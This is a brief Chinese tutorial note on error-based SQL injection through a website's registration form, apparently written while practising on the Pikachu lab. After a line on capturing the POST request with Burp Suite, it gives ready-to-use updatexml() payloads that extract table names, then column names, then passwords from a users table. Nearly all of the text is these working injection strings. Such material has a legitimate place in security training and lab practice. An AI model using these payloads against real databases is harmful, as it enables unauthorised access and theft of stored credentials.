一般网站的注册地方都是插入数据库的,没有过滤防护会产生漏洞。
一般需要用post方式,使用bp抓包
注册界面抓包
查看表名
nnn'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)
查看列名
nnn' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 2,1)),0) or'
查看内容
nnn' or updatexml(1,concat(0x7e,(select password from users limit 2,1)),0) or'
查看内容语句也可以写成
nnn' or updatexml(1,concat(0x7e,(select password from users limit 2,1)),0) or '1'='1''
是一样的效果